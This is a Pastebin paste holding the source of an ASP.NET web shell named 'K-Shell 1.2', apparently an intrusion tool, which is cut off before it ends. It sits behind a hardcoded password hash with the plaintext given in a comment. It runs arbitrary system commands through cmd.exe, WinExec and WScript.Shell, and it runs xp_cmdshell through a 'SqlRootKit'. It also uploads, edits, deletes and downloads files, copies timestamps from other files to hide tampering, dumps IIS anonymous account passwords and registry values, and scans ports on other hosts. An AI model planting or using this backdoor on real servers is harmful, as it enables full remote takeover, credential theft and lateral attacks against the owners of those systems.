Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
- <%@ Import Namespace="System.IO" %>
- <%@ import namespace="System.Diagnostics" %>
- <%@ import namespace="System.Threading" %>
- <%@ import namespace="System.Text" %>
- <%@ import namespace="System.Security.Cryptography" %>
- <%@ Import Namespace="System.Net.Sockets"%>
- <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
- <%@ import Namespace="System.DirectoryServices" %>
- <%@ import Namespace="Microsoft.Win32" %>
- <script language="VB" runat="server">
- Dim PASSWORD as string = "b4d6ff0fa5c971a600ca3d089e9e0022" ' love@22
- dim url,TEMP1,TEMP2,TITLE as string
- Function GetMD5(ByVal strToHash As String) As String
- Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider()
- Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash)
- bytesToHash = md5Obj.ComputeHash(bytesToHash)
- Dim strResult As String = ""
- Dim b As Byte
- For Each b In bytesToHash
- strResult += b.ToString("x2")
- Next
- Return strResult
- End Function
- Sub Login_click(sender As Object, E As EventArgs)
- if GetMD5(Textbox.Text)=PASSWORD then
- session("rooot")=1
- session.Timeout=60
- else
- response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
- end if
- End Sub
- 'Run w32 shell
- Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
- Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
- Sub RunCmdW32(Src As Object, E As EventArgs)
- dim command
- dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
- dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
- If Request.Form("txtCommand1") = "" Then
- command = "dir c:\"
- else
- command = Request.Form("txtCommand1")
- End If
- ExecuteCommand1(command,tempFile,txtCmdFile.Text)
- OutputTempFile1(tempFile,fileObject)
- 'txtCommand1.text=""
- End Sub
- Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String)
- Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
- Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
- Dim FailIfExists
- local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
- 'local_copy_of_cmd = Local_dir+"cmd.exe"
- 'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe"
- local_copy_of_cmd=cmdfile
- Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe"
- CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
- errReturn = WinExec(Target_copy_of_cmd + " /c " + command + " > " + tempFile , 10)
- response.write(errReturn)
- thread.sleep(500)
- End Sub
- Sub OutputTempFile1(tempFile,oFileSys)
- On Error Resume Next
- dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
- resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
- oFile.Close
- Call oFileSys.DeleteFile(tempFile, True)
- End sub
- 'End w32 shell
- 'Run WSH shell
- Sub RunCmdWSH(Src As Object, E As EventArgs)
- dim command
- dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
- dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
- dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
- If Request.Form("txtcommand2") = "" Then
- command = "dir c:\"
- else
- command = Request.Form("txtcommand2")
- End If
- ExecuteCommand2(command,tempFile)
- OutputTempFile2(tempFile,fileObject)
- txtCommand2.text=""
- End Sub
- Function ExecuteCommand2(cmd_to_execute, tempFile)
- Dim oScript
- oScript = Server.CreateObject("WSCRIPT.SHELL")
- Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
- End function
- Sub OutputTempFile2(tempFile,fileObject)
- On Error Resume Next
- dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
- resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
- oFile.Close
- Call fileObject.DeleteFile(tempFile, True)
- End sub
- 'End WSH shell
- 'System infor
- Sub output_all_environment_variables(mode)
- Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
- Dim de As DictionaryEntry
- For Each de In environmentVariables
- if mode="HTML" then
- response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
- else
- if mode="text"
- response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
- end if
- end if
- Next
- End sub
- Sub output_all_Server_variables(mode)
- dim item
- for each item in request.servervariables
- if mode="HTML" then
- response.write("<b>" + item + "</b> : ")
- response.write(request.servervariables(item))
- response.write("<br>")
- else
- if mode="text"
- response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
- end if
- end if
- next
- End sub
- 'End sysinfor
- Function Server_variables() As String
- dim item
- dim tmp As String
- tmp=""
- for each item in request.ServerVariables
- if request.servervariables(item) <> ""
- 'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
- tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r"
- end if
- next
- return tmp
- End function
- 'Begin List processes
- Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
- dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
- dim fields_split, fields_item,i
- 'on error resume next
- table("0","","")
- Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
- winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
- objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)
- fields_split = split(Fields_to_Show,",")
- for each item in objProcessInfo
- tr
- Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
- if Ubound(Fields_split)>0 then
- for i = 1 to ubound(fields_split)
- Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))
- next
- end if
- _tr
- next
- End function
- Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
- dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
- dim fields_split, fields_item,i,count
- newline
- rw("Showing the first " + cstr(MaxCount) + " Entries")
- newline
- newline
- table("1","","")
- Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
- _table
- winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
- ' objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)
- objProcessInfo = winObj.InstancesOf(Wmi_Function)
- fields_split = split(Fields_to_Show,",")
- count = 0
- for each item in objProcessInfo
- count = Count + 1
- table("1","","")
- tr
- Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
- if Ubound(Fields_split)>0 then
- for i = 1 to ubound(fields_split)
- Surround_by_TD(item.properties_.item(fields_split(i)).value)
- next
- end if
- _tr
- if count > MaxCount then exit for
- next
- End function
- 'End List processes
- 'Begin IIS_list_Anon_Name_Pass
- Sub IIS_list_Anon_Name_Pass()
- Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
- IIsComputerObj = CreateObject("WbemScripting.SWbemLocator") ' Create an instance of the IIsComputer object
- providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
- nodeObj = providerObj.InstancesOf("IIsWebVirtualDirSetting") ' - IISwebServerSetting
- Dim MaxCount = 20,Count = 0
- hr
- RW("only showing the first "+cstr(MaxCount) + " items")
- hr
- for each item in nodeObj
- response.write("<b>" + item.AppFriendlyName + " </b> - ")
- response.write("(" + item.AppPoolId + ") ")
- response.write(item.AnonymousUserName + " : ")
- response.write(item.AnonymousUserPass)
- response.write("<br>")
- response.flush
- Count = Count +1
- If Count > MaxCount then exit for
- next
- hr
- End sub
- 'End IIS_list_Anon_Name_Pass
- Private Function CheckIsNumber(ByVal sSrc As String) As Boolean
- Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$")
- If reg.IsMatch(sSrc) Then
- Return True
- Else
- Return False
- End If
- End Function
- Public Function IISSpy() As String
- Dim iisinfo As String = ""
- Dim iisstart As String = ""
- Dim iisend As String = ""
- Dim iisstr As String = "IIS://localhost/W3SVC"
- Dim i As Integer = 0
- Try
- Dim mydir As New DirectoryEntry(iisstr)
- iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"
- For Each child As DirectoryEntry In mydir.Children
- If CheckIsNumber(child.Name.ToString()) Then
- Dim dirstr As String = child.Name.ToString()
- Dim tmpstr As String = ""
- Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr)
- Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir")
- i = i + 1
- iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>"
- iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>"
- iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>"
- iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>"
- iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>"
- iisinfo += "</TR>"
- End If
- Next
- iisend = "</TABLE>"
- Catch ex As Exception
- Return ex.Message
- End Try
- Return iisstart + iisinfo + iisend
- End Function
- Sub RegistryRead(Src As Object, E As EventArgs)
- Try
- Dim regkey As String = txtRegKey.Text
- Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1)
- Dim rk As RegistryKey = Nothing
- Dim buffer As Object
- Dim regstr As String = ""
- If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then
- rk = Registry.LocalMachine.OpenSubKey(subkey)
- End If
- If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then
- rk = Registry.ClassesRoot.OpenSubKey(subkey)
- End If
- If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then
- rk = Registry.CurrentUser.OpenSubKey(subkey)
- End If
- If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then
- rk = Registry.Users.OpenSubKey(subkey)
- End If
- If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then
- rk = Registry.CurrentConfig.OpenSubKey(subkey)
- End If
- buffer = rk.GetValue(txtRegValue.Text, "NULL")
- dim tmpbyte As Byte = 0
- lblresultReg.Text = "<br>Result : " + buffer.ToString()
- Catch ex As Exception
- Response.write(ex.Message)
- End Try
- End Sub
- ' Begin List Web Site Home Directory Properties
- ' End List Web Site Home Directory Properties
- Sub RunCMD(Src As Object, E As EventArgs)
- Try
- Dim kProcess As New Process()
- Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
- kProcessStartInfo.UseShellExecute = False
- kProcessStartInfo.RedirectStandardOutput = true
- kProcess.StartInfo = kProcessStartInfo
- kProcessStartInfo.Arguments="/c " & Cmd.text
- kProcess.Start()
- Dim myStreamReader As StreamReader = kProcess.StandardOutput
- Dim myString As String = myStreamReader.Readtoend()
- kProcess.Close()
- result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
- Cmd.text=""
- Catch
- result.text="This function has disabled!"
- End Try
- End Sub
- Sub CloneTime(Src As Object, E As EventArgs)
- existdir(time1.Text)
- existdir(time2.Text)
- Dim thisfile As FileInfo =New FileInfo(time1.Text)
- Dim thatfile As FileInfo =New FileInfo(time2.Text)
- thisfile.LastWriteTime = thatfile.LastWriteTime
- thisfile.LastAccessTime = thatfile.LastAccessTime
- thisfile.CreationTime = thatfile.CreationTime
- response.Write("<font color=""red"">Clone Time Success!</font>")
- End Sub
- sub Editor(Src As Object, E As EventArgs)
- dim mywrite as new streamwriter(filepath.text,false,encoding.default)
- mywrite.write(content.text)
- mywrite.close
- response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
- end sub
- Sub UpLoad(Src As Object, E As EventArgs)
- dim filename,loadpath as string
- filename=path.getfilename(UpFile.value)
- loadpath=request.QueryString("src") & filename
- if file.exists(loadpath)=true then
- response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
- response.End()
- end if
- UpFile.postedfile.saveas(loadpath)
- response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
- response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
- End Sub
- Sub NewFD(Src As Object, E As EventArgs)
- url=request.form("src")
- if NewFile.Checked = True then
- dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
- mywrite.close
- response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
- else
- directory.createdirectory(url & NewName.Text)
- response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
- end if
- End Sub
- Sub del(a)
- if right(a,1)="\" then
- dim xdir as directoryinfo
- dim mydir as new DirectoryInfo(a)
- dim xfile as fileinfo
- for each xfile in mydir.getfiles()
- file.delete(a & xfile.name)
- next
- for each xdir in mydir.getdirectories()
- call del(a & xdir.name & "\")
- next
- directory.delete(a)
- else
- file.delete(a)
- end if
- End Sub
- Sub copydir(a,b)
- dim xdir as directoryinfo
- dim mydir as new DirectoryInfo(a)
- dim xfile as fileinfo
- for each xfile in mydir.getfiles()
- file.copy(a & "\" & xfile.name,b & xfile.name)
- next
- for each xdir in mydir.getdirectories()
- directory.createdirectory(b & path.getfilename(a & xdir.name))
- call copydir(a & xdir.name & "\",b & xdir.name & "\")
- next
- End Sub
- Sub xexistdir(temp,ow)
- if directory.exists(temp)=true or file.exists(temp)=true then
- if ow=0 then
- response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
- elseif ow=1 then
- del(temp)
- else
- dim d as string = session("cutboard")
- if right(d,1)="\" then
- TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
- else
- TEMP2=url & second(now) & replace(path.getfilename(d),"","")
- end if
- end if
- end if
- End Sub
- Sub existdir(temp)
- if file.exists(temp)=false and directory.exists(temp)=false then
- response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\") &" ! Is it a CD-ROM ?');</sc" & "ript>")
- response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
- response.End()
- end if
- End Sub
- Sub RunSQLCMD(Src As Object, E As EventArgs)
- Dim adoConn,strQuery,recResult,strResult
- if SqlName.Text<>"" then
- adoConn=Server.CreateObject("ADODB.Connection")
- adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
- If Sqlcmd.Text<>"" Then
- strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
- recResult = adoConn.Execute(strQuery)
- If NOT recResult.EOF Then
- Do While NOT recResult.EOF
- strResult = strResult & chr(13) & recResult(0).value
- recResult.MoveNext
- Loop
- End if
- recResult = Nothing
- strResult = Replace(strResult," "," ")
- strResult = Replace(strResult,"<","<")
- strResult = Replace(strResult,">",">")
- resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
- SqlCMD.Text=""
- End if
- adoConn.Close
- End if
- End Sub
- Sub RunSQLQUERY(Src As Object, E As EventArgs)
- Dim adoConn,strQuery,recResult,strResult
- if txtSqlName.Text<>"" then
- adoConn=Server.CreateObject("ADODB.Connection")
- adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text)
- If txtSqlcmd.Text<>"" Then
- strQuery = txtSqlcmd.Text
- recResult = adoConn.Execute(strQuery)
- If NOT recResult.EOF Then
- Do While NOT recResult.EOF
- strResult = strResult & chr(13) & recResult(0).value
- recResult.MoveNext
- Loop
- End if
- recResult = Nothing
- strResult = Replace(strResult," "," ")
- strResult = Replace(strResult,"<","<")
- strResult = Replace(strResult,">",">")
- lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
- txtSqlCMD.Text=""
- End if
- adoConn.Close
- End if
- End Sub
- Function GetStartedTime(ms)
- GetStartedTime=cint(ms/(1000*60*60))
- End function
- Function getIP()
- Dim strIPAddr as string
- If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
- strIPAddr = Request.ServerVariables("REMOTE_ADDR")
- ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
- strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
- ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
- strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
- Else
- strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
- End If
- getIP = Trim(Mid(strIPAddr, 1, 30))
- End Function
- Function Getparentdir(nowdir)
- dim temp,k as integer
- temp=1
- k=0
- if len(nowdir)>4 then
- nowdir=left(nowdir,len(nowdir)-1)
- end if
- do while temp<>0
- k=temp+1
- temp=instr(temp,nowdir,"\")
- if temp =0 then
- exit do
- end if
- temp = temp+1
- loop
- if k<>2 then
- getparentdir=mid(nowdir,1,k-2)
- else
- getparentdir=nowdir
- end if
- End function
- Function Rename()
- url=request.QueryString("src")
- if file.exists(Getparentdir(url) & request.Form("name")) then
- rename=0
- else
- file.copy(url,Getparentdir(url) & request.Form("name"))
- del(url)
- rename=1
- end if
- End Function
- Function GetSize(temp)
- if temp < 1024 then
- GetSize=temp & " bytes"
- else
- if temp\1024 < 1024 then
- GetSize=temp\1024 & " KB"
- else
- if temp\1024\1024 < 1024 then
- GetSize=temp\1024\1024 & " MB"
- else
- GetSize=temp\1024\1024\1024 & " GB"
- end if
- end if
- end if
- End Function
- Sub downTheFile(thePath)
- dim stream
- stream=server.createObject("adodb.stream")
- stream.open
- stream.type=1
- stream.loadFromFile(thePath)
- response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
- response.addHeader("Content-Length",stream.Size)
- response.charset="UTF-8"
- response.contentType="application/octet-stream"
- response.binaryWrite(stream.read)
- response.flush
- stream.close
- stream=nothing
- response.End()
- End Sub
- 'H T M L S N I P P E T S
- public sub Newline
- response.write("<BR>")
- end sub
- public sub TextNewline
- response.write(vbnewline)
- end sub
- public sub rw(text_to_print) ' Response.write
- response.write(text_to_print)
- end sub
- public sub rw_b(text_to_print)
- rw("<b>"+text_to_print+"</b>")
- end sub
- public sub hr()
- rw("<hr>")
- end sub
- public sub ul()
- rw("<ul>")
- end sub
- public sub _ul()
- rw("</ul>")
- end sub
- public sub table(border_size,width,height)
- rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
- end sub
- public sub _table()
- rw("</table>")
- end sub
- public sub tr()
- rw("<tr>")
- end sub
- public sub _tr()
- rw("</tr>")
- end sub
- public sub td()
- rw("<td>")
- end sub
- public sub _td()
- rw("</td>")
- end sub
- public sub td_span(align,name,contents)
- rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
- end sub
- Public sub td_link(align,title,link,target)
- rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
- end sub
- Public sub link(title,link,target)
- rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
- end sub
- Public sub link_hr(title,link,target)
- rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
- hr
- end sub
- Public sub link_newline(title,link,target)
- rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
- newline
- end sub
- public sub empty_Cell(ColSpan)
- rw("<td colspan='"+cstr(colspan)+"'></td>")
- end sub
- public sub empty_row(ColSpan)
- rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
- end sub
- Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
- dim rowItem
- rowItems = split(rowItems,",")
- response.write("<tr bgcolor="+bgcolor+">")
- for each rowItem in RowItems
- response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
- next
- response.write("</tr>")
- end sub
- Public sub TR_TD(cellContents)
- response.write("<td>")
- response.write(cellContents)
- response.write("</td>")
- end sub
- Public sub Surround_by_TD(cellContents)
- response.write("<td>")
- response.write(cellContents)
- response.write("</td>")
- end sub
- Public sub Surround_by_TD_and_Bold(cellContents)
- response.write("<td><b>")
- response.write(cellContents)
- response.write("</b></td>")
- end sub
- Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
- response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
- response.write(cellContents)
- response.write("</b></font></td>")
- end sub
- Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
- response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
- response.write(" <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
- response.write(" <tr heigth=20>")
- response.write(" <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
- response.write(" </tr>")
- response.write(" <tr>")
- response.write(" <td>"+main_Cell_contents+"</td>")
- response.write(" </tr>")
- response.write(" </table>")
- response.write("</div>")
- end sub
- Public sub Create_Div_open(top,left,width,height,z_index)
- response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
- end sub
- Public sub Create_Div_close()
- response.write("</div>")
- end sub
- public sub Create_Iframe(left, top, width, height, name,src)
- rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")
- rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
- rw("</span>")
- end sub
- public sub Create_Iframe_relative(width, height, name,src)
- rw(" <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
- end sub
- public sub return_100_percent_table()
- rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
- end sub
- public sub font_size(size)
- rw("<font size="+size+">")
- end sub
- public sub end_font()
- rw("</font>")
- end sub
- public sub red(contents)
- rw("<font color=red>"+contents+"</font>")
- end sub
- public sub yellow(contents)
- rw("<font color='#FF8800'>"+contents+"</font>")
- end sub
- public sub green(contents)
- rw("<font color=green>"+contents+"</font>")
- end sub
- public sub print_var(var_name, var_value,var_description)
- if var_description<> "" Then
- rw(b_(var_name)+" : " + var_value + i_(" ("+var_description+")"))
- else
- rw(b_(var_name)+" : " + var_value)
- end if
- newline
- end sub
- ' Functions
- public function br_()
- br_ = "<br>"
- end function
- public function b_(contents)
- b_ = "<b>"+ contents + "</b>"
- end function
- public function i_(contents)
- i_ = "<i>"+ contents + "</i>"
- end function
- public function li_(contents)
- li_ = "<li>"+ contents + "</li>"
- end function
- public function h1_(contents)
- h1_ = "<h1>"+ contents + "</h1>"
- end function
- public function h2_(contents)
- h2_ = "<h2>"+ contents + "</h2>"
- end function
- public function h3_(contents)
- h3_ = "<h3>"+ contents + "</h3>"
- end function
- public function big_(contents)
- big_ = "<big>"+ contents + "</big>"
- end function
- public function center_(contents)
- center_ = "<center>"+ cstr(contents) + "</center>"
- end function
- public function td_force_width_(width)
- td_force_width_ = "<br><img src='' height=0 width=" + cstr(width) + " border=0>"
- end function
- public function red_(contents)
- red_ = "<font color=red>"+contents+"</font>"
- end function
- public function yellow_(contents)
- yellow_ = "<font color='#FF8800'>"+contents+"</font>"
- end function
- public function green_(contents)
- green_ = "<font color=green>"+contents+"</font>"
- end function
- Public function link_(title,link,target)
- link_ = "<a href='"+link+"' target='"+target+"'>"+title+"</a>"
- end function
- 'End HTML SNIPPETS
- 'Begin Scanner
- Public Class Scanner
- Public Ips As New ArrayList()
- Public ports As New ArrayList()
- Public succMsg As New StringBuilder()
- Public ret As ListBox
- Public errMsg As String = ""
- Public Timeout As Integer = 3000
- Public Sub start()
- Dim thread As New Thread(New ThreadStart(AddressOf Me.run))
- thread.Start()
- thread = Nothing
- End Sub
- Public Sub run()
- ret.Items.Clear()
- For Each ip As String In Ips
- For Each port As String In ports
- 'ret.Items.Add(ip + ":" + port);
- Dim scanres As String = ""
- Try
- Dim tcpClient As New TcpClient()
- Try
- tcpClient.Connect(ip, Int32.Parse(port))
- tcpClient.Close()
- ret.Items.Add(ip + " : " + port + " ................................. Open")
- Catch e As SocketException
- ret.Items.Add(ip + " : " + port + " ................................. Close")
- End Try
- tcpClient.Close()
- Catch exp As SocketException
- errMsg = "ErrorCode : " + exp.ErrorCode.ToString() + " : " + exp.Message
- End Try
- Next
- Next
- End Sub
- End Class
- Public Function MakeIps(ByVal StartIp As String, ByVal EndIP As String) As ArrayList
- Dim IpList As New ArrayList()
- Dim IpParts1 As String() = New String(3) {}
- Dim IpParts2 As String() = New String(3) {}
- IpParts1 = StartIp.Split("."C)
- IpParts2 = EndIP.Split("."C)
- Dim nTime As Integer = (Int32.Parse(IpParts2(0)) - Int32.Parse(IpParts1(0))) * 254 * 254 * 254 + (Int32.Parse(IpParts2(1)) - Int32.Parse(IpParts1(1))) * 254 * 254 + (Int32.Parse(IpParts2(2)) - Int32.Parse(IpParts1(2))) * 254 + (Int32.Parse(IpParts2(3)) - Int32.Parse(IpParts1(3))) + 1
- If nTime < 0 Then
- Response.Write("IP Address Error.Check" & Chr(13) & "" & Chr(10) & "")
- Return Nothing
- End If
- For n As Integer = 0 To nTime - 1
- IpList.Add(IpParts1(0) + "." + IpParts1(1) + "." + IpParts1(2) + "." + IpParts1(3))
- Dim tmp As Integer = Int32.Parse(IpParts1(3)) + 1
- IpParts1(3) = tmp.ToString()
- If IpParts1(3).Equals("255") Then
- tmp = Int32.Parse(IpParts1(2)) + 1
- IpParts1(2) = tmp.ToString()
- IpParts1(3) = "1"
- End If
- If IpParts1(2).Equals("255") Then
- tmp = Int32.Parse(IpParts1(1)) + 1
- IpParts1(1) = tmp.ToString()
- IpParts1(2) = "1"
- End If
- If IpParts1(1).Equals("255") Then
- tmp = Int32.Parse(IpParts1(0)) + 1
- IpParts1(0) = tmp.ToString()
- IpParts1(1) = "1"
- End If
- Next
- Return IpList
- End Function
- Protected Sub btnScan_Click(ByVal sender As Object, ByVal e As EventArgs)
- If txtStartIP.Text = "" OrElse txtEndIP.Text = "" OrElse txtPorts.Text = "" Then
- Response.Write("IP OR Ports Error.Check")
- Return
- End If
- Dim StartIp As String = txtStartIP.Text
- Dim EndIp As String = txtEndIP.Text
- Dim ips As ArrayList = MakeIps(StartIp, EndIp)
- Dim ScanPorts As New ArrayList()
- Dim ports As String() = txtPorts.Text.Split(","C)
- For Each port As String In ports
- 'Response.Write(port);
- ScanPorts.Add(port)
- Next
- lstRet.Visible = True
- Label1.Visible = True
- Dim myscanner As New Scanner()
- myscanner.Ips = ips
- myscanner.ports = ScanPorts
- myscanner.ret = Me.lstRet
- myscanner.run()
- End Sub
- Protected Sub btnReset_Click(ByVal sender As Object, ByVal e As EventArgs)
- txtStartIP.Text = ""
- txtEndIP.Text = ""
- txtPorts.Text = ""
- Label1.Visible = False
- lstRet.Visible = False
- End Sub
- 'End Scanner
- </script>
- <%
- if request.QueryString("action")="down" and session("rooot")=1 then
- downTheFile(request.QueryString("src"))
- response.End()
- end if
- Dim act as string = request.QueryString("action")
- if act="cmd" then
- TITLE="CMD.NET"
- elseif act="cmdw32" then
- TITLE="ASP.NET W32 Shell"
- elseif act="cmdwsh" then
- TITLE="ASP.NET WSH Shell"
- elseif act="sqlrootkit" then
- TITLE="SqlRootKit.NET"
- elseif act="clonetime" then
- TITLE="Clone Time"
- elseif act="information" then
- TITLE="Web Server Info"
- elseif act="goto" then
- TITLE="K-Shell 1.2"
- elseif act="pro1" then
- TITLE="List processes from server"
- elseif act="pro2" then
- TITLE="List processes from server"
- elseif act="user" then
- TITLE="List User Accounts"
- elseif act="applog" then
- TITLE="List Application Event Log Entries"
- elseif act="syslog" then
- TITLE="List System Event Log Entries"
- elseif act="auser" then
